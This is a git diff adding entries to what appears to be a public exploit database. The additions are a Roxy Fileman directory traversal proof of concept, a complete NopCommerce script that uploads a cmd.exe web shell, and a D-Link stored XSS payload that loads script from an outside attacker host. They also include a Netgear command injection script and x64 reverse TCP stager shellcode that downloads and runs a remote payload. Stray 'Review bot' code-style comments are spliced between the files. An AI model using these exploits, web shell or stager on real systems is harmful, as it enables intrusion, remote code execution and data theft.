diff --git a/exploits/aspx/webapps/47777.txt b/exploits/aspx/webapps/47777.txt
new file mode 100644
index 000000000..3e7d71a37
--- /dev/null
+++ b/exploits/aspx/webapps/47777.txt
@@ -0,0 +1,125 @@
+# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal
+# Author: Patrik Lantz
+# Date: 2019-12-06
+# Software: Roxy Fileman
+# Version: 1.4.5
+# Vendor Homepage: http://www.roxyfileman.com/
+# Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
+# CVE: N/A
+
+Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
+(using custom account as application pool identity for the IIS worker process).
+
+
+===========================
+Description
+===========================
+Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
+the IIS worker process privileges.
+This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
+of this file will be triggered on the next login.
+
+
+Proof of Concept
+===========================
+
+It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
+The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
+Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
+allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
+the .lnk extension.
+
+1) Create a shortcut file
+
+By using for example the target executable C:\Windows\System32\Calc.exe
+Remove the .lnk extension and rename it to use the .dat extension.
+
+
+2) Upload the file
+
+Either upload the .dat file manually via the Roxy Fileman web interface
+or programmatically using a HTTP POST request.
+
+Details of the request:
+
+POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
+Host: 127.0.0.1:50357
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------159382831523528
+Content-Length: 924
+Origin: http://127.0.0.1:50357
+Connection: close
+Referer: http://127.0.0.1:50357/wwwroot/fileman/
+Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
+
+-----------------------------159382831523528
+Content-Disposition: form-data; name="action"
+
+upload
+-----------------------------159382831523528
+Content-Disposition: form-data; name="method"
+
+ajax
+-----------------------------159382831523528
+Content-Disposition: form-data; name="d"
+
+/wwwroot/fileman/Uploads/test2
+-----------------------------159382831523528
+Content-Disposition: form-data; name="files[]"; filename="poc.dat"
+Content-Type: application/octet-stream
+
+...data omitted...
+-----------------------------159382831523528--
+
+
+
+3) Write the file to the Startup folder using the RENAMEFILE action
+The new filename is set via the n parameter. The correct path can be identified by trial and error depending
+on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).
+
+If the necessary directories do not exist, they can be created using the CREATEDIR action which also
+is vulnerable to path traversal.
+
+
+POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
+Host: 127.0.0.1:50357
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 66
+Origin: http://127.0.0.1:50357
+Connection: close
+Referer: http://127.0.0.1:50357/wwwroot/fileman/
+Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list
+
+f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat
+
+
+
+Workaround / Fix:
+===========================
+
+Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions:
+CREATEDIR, COPYFILE and RENAMEFILE.
+
+Recommendations for users of Roxy Fileman:
+ - Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.
+
+
+
+Timeline
+===========================
+2019-12-06: Discovered the vulnerability
+2019-12-06: Reported to the vendor (vendor is unresponsive)
+2019-12-11: Request CVE
+2019-12-13: Advisory published
+
+Discovered By:
+===========================
+Patrik Lantz
\ No newline at end of file
diff --git a/exploits/aspx/webapps/47783.py b/exploits/aspx/webapps/47783.py
new file mode 100755
index 000000000..a914ab630
--- /dev/null
+++ b/exploits/aspx/webapps/47783.py
@@ -0,0 +1,79 @@
+# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
+# Author: Alessandro Magnosi (d3adc0de)
+# Date: 2019-07-07
+# Vendor Homepage: https://www.nopcommerce.com/
+# Software Link : https://www.nopcommerce.com/
+# Tested Version: 4.2.0
+# Vulnerability Type: Privilege Escalation
+# Tested on OS: Windows 10, CentOS, Docker
+# Exploit designed for: NopCommerce 4.2.0 on IIS
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+import warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+def proxy(flag):
+    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None
+
+def geturl(baseurl, type):
+    if type == "login":
+        return baseurl + "/login"
+    elif type == "mv":
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
+    elif type == "mkdir":
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
+    elif type == "put":
+        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
+    elif type == "contactus":
+        return baseurl + "/contactus"
+    else:
+        return ""
+
+def login(email, password, url, proxy):
+    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
+    cookie = res.cookies.get_dict()
+    soup = BeautifulSoup(res.text, features="html.parser")
+    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
+    res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
+    cookies = res.cookies.get_dict()
+    return { **cookies, **cookie }
+
+def shellupload(email, password, url, proxy): + print("[+] Trying uploading shell from") + cookies = login(email, password, url, proxy) + # Rename Common Directory + requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Create Common Directory + requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False) + # Upload File into Common + requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n 
StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n

@ViewData[\"Title\"].

\r\n

@ViewData[\"Message\"]

\r\n

Output for:> @cmd

\r\n\r\n\r\n
\r\nC#:>@cmd\r\n\t\r\n@result\r\n\t\r\nC#:>\r\n
\r\n\r\n
\r\n\r\n

Enter your command below:

\r\n\r\n \r\n\t\r\n\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    # Test if it is working
+    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
+    soup = BeautifulSoup(res.text, features="html.parser")
+    test = soup.find("span", {"id" : "cmdResult"})
+    if test is None:
+        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
+    else:
+        print("[+] Shell uploaded under contact us page")
+
+def main():
+    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
+    parser.add_argument(
+        '-e', '--email', required=True, type=str, help='Username')
+    parser.add_argument(
+        '-p', '--password', required=True, type=str, help='Password')
+    parser.add_argument(
+        '-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
+    parser.add_argument(
+        '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
+
+    args = parser.parse_args()
+
+    shellupload(args.email, args.password, args.url, proxy(args.proxy))
+
+if __name__ == '__main__':
+    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47776.txt b/exploits/hardware/webapps/47776.txt
new file mode 100644
index 000000000..2e690c58e
--- /dev/null
+++ b/exploits/hardware/webapps/47776.txt
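Review bot: `geturl`'s second parameter is named `type`, which shadows the builtin for the whole function body, and the five-way `if`/`elif` on a string key is a dispatch-table case; `def geturl(baseurl, kind):` over a module-level `dict` of kind → path suffix, with `.get(kind, "")` for the fallback, gives the same results in far fewer lines. In `login`, `soup.find("input", {"name":"__RequestVerificationToken"})["value"]` fails with an opaque `TypeError: 'NoneType' object is not subscriptable` whenever the login page comes back without that input (for example when the server answers with a redirect, which `allow_redirects=False` leaves unfollowed), so a `None` check that prints a clear message would make that failure legible. The same `User-Agent` literal is repeated in every request in `shellupload`; one module-level constant removes the duplication. The multipart payload string inside `shellupload` is split across the extracted lines and could not be read as one unit, so only the code around it was reviewed.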
@@ -0,0 +1,37 @@
+# Exploit Title: D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting
+# Date: 2019-12-13
+# Exploit Author: Sanyam Chawla
+# Vendor Homepage: http://www.dlink.co.in
+# Category: Hardware (Wi-fi Router)
+# Hardware Link: http://www.dlink.co.in/products/?pid=678
+# Hardware Version: T1
+# Firmware Version: 20.07
+# Tested on: Windows 10 and Kali linux
+# CVE: N/A
+
+Reproduction Steps:
+1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
+2. Go to Maintenance page and click on Admin on the left panel
+3. Put blind xss Payload in to the name field “>. This payload saved by the server and its reflected in the user page.
+4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
+5. For HTML injection just put Testing in username field, you will get the username bold in your homepage.
+
+#Burp Intercept
+
+POST /form2userconfig.cgi HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
+Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 180
+Origin: http://192.168.0.1
+Connection: close
+Referer: http://192.168.0.1/userconfig.htm
+Cookie: SessionID=
+Upgrade-Insecure-Requests: 1
+
+username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
+%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47778.txt b/exploits/hardware/webapps/47778.txt
index 0d8c041c4..062ba05e4 100644
--- a/exploits/hardware/webapps/47778.txt
+++ b/exploits/hardware/webapps/47778.txt
@@ -7,7 +7,7 @@
 # Hardware Version: T1
 # Firmware Version: 20.07
 # Tested on: Windows 10 and Kali linux
-# CVE: N/A
+# CVE: CVE-2019-19743
 # Reproduction Steps:
 # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
diff --git a/exploits/hardware/webapps/47782.py b/exploits/hardware/webapps/47782.py
new file mode 100755
index 000000000..8500b1891
--- /dev/null
+++ b/exploits/hardware/webapps/47782.py
@@ -0,0 +1,27 @@
+# Exploit Title: Netgear R6400 - Remote Code Execution
+# Date: 2019-12-14
+# Exploit Author: Kevin Randall
+# CVE: CVE-2016-6277
+# Vendor Homepage: https://www.netgear.com/
+# Category: Hardware
+# Version: V1.0.7.2_1.1.93
+
+# PoC
+
+#!/usr/bin/python
+
+import urllib2
+
+IP_ADDR = "192.168.1.1"
+PROTOCOL = "http://"
+DIRECTORY = "/cgi-bin/;"
+CMD = "date"
+FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD
+
+req = urllib2.Request(url = FULL_URL)
+response = urllib2.urlopen(req)
+commandoutput = response.read()
+spl_word = "}"
+formattedoutput = commandoutput
+result = formattedoutput.rpartition(spl_word)[2]
+print result
\ No newline at end of file
diff --git a/exploits/java/webapps/47781.txt b/exploits/java/webapps/47781.txt
new file mode 100644
index 000000000..e6f5e7cff
--- /dev/null
+++ b/exploits/java/webapps/47781.txt
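Review bot: The `#!/usr/bin/python` line in 47782.py sits after the comment header and a blank line, at line 11 of the file, so it is not a shebang — only a `#!` on the very first line is honoured — yet the file is added with mode 100755 as if it were directly executable; either move it to line 1 or drop the executable bit. `formattedoutput = commandoutput` is a pure alias that adds nothing, so `result = commandoutput.rpartition(spl_word)[2]` says the same thing in one line. The script is Python 2 only (`urllib2`, the `print result` statement) and nothing in the header says so; a `# Requires: Python 2` line next to the other header fields would save the next reader a failed run.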
@@ -0,0 +1,32 @@
+# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
+# Date: 2019-12-17
+# Exploit Author: MTK
+# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
+# Software Link: https://www.zendesk.com/apps/support/survey/
+# Version: Up to v1.6
+# Tested on: Zendesk - Firefox/Windows
+
+# Software description:
+# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question.
+# You can get more granular satisfaction data without compromising the response rate.
+# Ask an optional NPS question on the landing page. View reports and drill down into the response
+# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in
+# your trigger or automation. Customize the landing pages for each of your brands.
+
+# Technical Details & Impact:
+# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server
+# for later use. The payload is automatically served to users who browse web pages and executed in
+# their context. Thus, the victims do not need to click on a malicious link to run the payload.
+# All they have to do is visit a vulnerable web page.
+
+# POC
+
+1. Open Support ticket in Zendesk and send XSS payload e.g;
+
+2. Generate survey request to rate the ticket and payload will execute;
+
+# Time line
+09-19-2019 - Vulnerability discovered
+09-20-2019 - Vendor contacted
+12-02-2019 - Detailed report shared and full disclosure time line given with no response
+12-17-2019 - Full Disclosure
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 25ae9288b..548ae3f49 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42087,4 +42087,9 @@ id,file,description,date,author,type,platform,port
 47772,exploits/php/webapps/47772.rb,"OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)",2019-12-12,"Onur ER",webapps,php,
 47773,exploits/php/webapps/47773.txt,"Bullwark Momentum Series JAWS 1.0 - Directory Traversal",2019-12-12,"numan türle",webapps,php,
 47774,exploits/hardware/webapps/47774.txt,"NVMS 1000 - Directory Traversal",2019-12-13,"numan türle",webapps,hardware,
+47776,exploits/hardware/webapps/47776.txt,"D-Link DIR-615 Wireless Router  -  Persistent Cross-Site Scripting",2019-12-16,"Sanyam Chawla",webapps,hardware,
+47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,
 47778,exploits/hardware/webapps/47778.txt,"D-Link DIR-615 - Privilege Escalation",2019-12-16,"Sanyam Chawla",webapps,hardware,
+47781,exploits/java/webapps/47781.txt,"Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting",2019-12-17,MTK,webapps,java,
+47782,exploits/hardware/webapps/47782.py,"Netgear R6400 - Remote Code Execution",2019-12-17,"Kevin Randall",webapps,hardware,
+47783,exploits/aspx/webapps/47783.py,"NopCommerce 4.2.0 - Privilege Escalation",2019-12-17,"Alessandro Magnosi",webapps,aspx,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 2e5fc06d0..a4628419e 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1009,3 +1009,4 @@ id,file,description,date,author,type,platform
 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux
 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
 47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
+47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/47784.txt b/shellcodes/linux_x86-64/47784.txt
new file mode 100644
index 000000000..87ce285a2
--- /dev/null
+++ b/shellcodes/linux_x86-64/47784.txt
@@ -0,0 +1,163 @@ +;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) +;# Date: 2019-12-16 +;# Author: Lee Mazzoleni +;# Tested on: Ubuntu 18.04.2 LTS +; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this +; this code is 188 bytes total (less if you delete the exit() syscall at the end) + +global _start + +section .text +_start: + + ;// =================> + ;// HEAP ALLOCATION => + ;// =================> + xor rax, rax + mov al, 6 + mov cl, 2 + imul ax, cx ;// int brk() + xor rdi, rdi + syscall ;// brk() + xor rax, rax + mov al, 2 + mov cl, 6 + imul ax, cx + xor rdi, rdi + mov dil, 128 + imul di, 32 + syscall ;// brk(0x1000) - 4096 bytes + xchg rcx, rax ;// save addr of our allocated memory in rcx + + ;//=======================> + ;// MAP HEAP PERMISSIONS => + ;//=======================> + xor rax, rax + mov al, 9 + xchg rdi, rcx + xor rsi, rsi + mov sil, 128 + imul si, 32 + xor rdx, rdx + mov dl, 0x7 + xor r10, r10 + mov r10b, 0x21 + xor r9, r9 + mov r8, -1 + syscall ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0) + mov r9, rax ;// save heap address in r9 + + ;// ===================> + ;// SOCKET CONNECTION => + ;// ===================> + xor rax, rax + mov al, 41 ;// int socket() + xor rdi, rdi + inc rdi + inc rdi ;// AF_INET + xor rsi, rsi + inc rsi ;// SOCK_STREAM + xor rdx, rdx + mov dl, 6 ;// IPPROTO_TCP + syscall ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) + push rax + pop rdi ;// save the socket's fd in rdi for connect() to use + + xor rax, rax + push rax + mov dword [rsp-4], 0x2a37a8c0 ;// 192.168.55.42 + mov word [rsp-6], 0xbb01 ;// port 443 in lil' endian + sub rsp, 6 + push word 0x2 + + xor rax, rax + mov al, 42 ;// int connect() + mov rsi, rsp + xor rdx, rdx + mov dl, 16 + syscall ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16) + + ;// ====================================> + ;// READ CODE FROM 
SOCKET FD INTO HEAP => + ;// ====================================> + mov rsi, r9 ;// heap addr still saved in r9 + xor rdx, rdx + mov dl, 41 ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing) + xor rax, rax + syscall ;// read(3, heap_addr, SIZE) + + ;// =================> + ;// CLOSE SOCKET FD => + ;// =================> + xor rax, rax + mov al, 3 + syscall ;// close(3) + + jmp r9 ;// jmp to the heap address in r9 and execute the downloaded payload + + ;// =========> + ;// EXIT(0) => this bit is unnecessary if your payload already calls exit() + ;// =========> + xor rax, rax + mov al, 60 + xor rdi, rdi + syscall + + +; ===============> +; ===== Usage ===> +; ===============> +; ========================================================================================= +; this program downloads a secondary payload from a remote host, and executes it. +; in this example, the payload used will be a simple hello-world-like program (hello.asm): +; ========================================================================================= +; global _start +; section .text +; _start: +; mov rax, 1 +; mov rdi, 1 +; mov rsi, 0x0a21216f6c6c6548 ; "Hello!!\n" +; push rsi +; mov rsi, rsp +; mov rdx, 8 +; syscall +; mov rax, 60 +; xor rdi, rdi +; syscall +; ========================================================================================= +; 1.) compile your payload: +; ----------------------------------------------------------------------------------------- +; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o +; ========================================================================================= +; 2.) 
retrieve the opcodes for the payload: +; ----------------------------------------------------------------------------------------- +; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d' ' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo +; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 +; ========================================================================================= +; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this: +; ----------------------------------------------------------------------------------------- +; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l +; 41 +; ========================================================================================= +; 4.) decode the bytes into raw form and serve it via netcat listener: +; ----------------------------------------------------------------------------------------- +; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload +; nc -lvp 443 < payload +; listening on [any] 443 ... +; ========================================================================================= +; 5.) one last step before compiling this stager, add your own IP address to line 69: +; ----------------------------------------------------------------------------------------- +; import struct, socket +; print(hex(struct.unpack('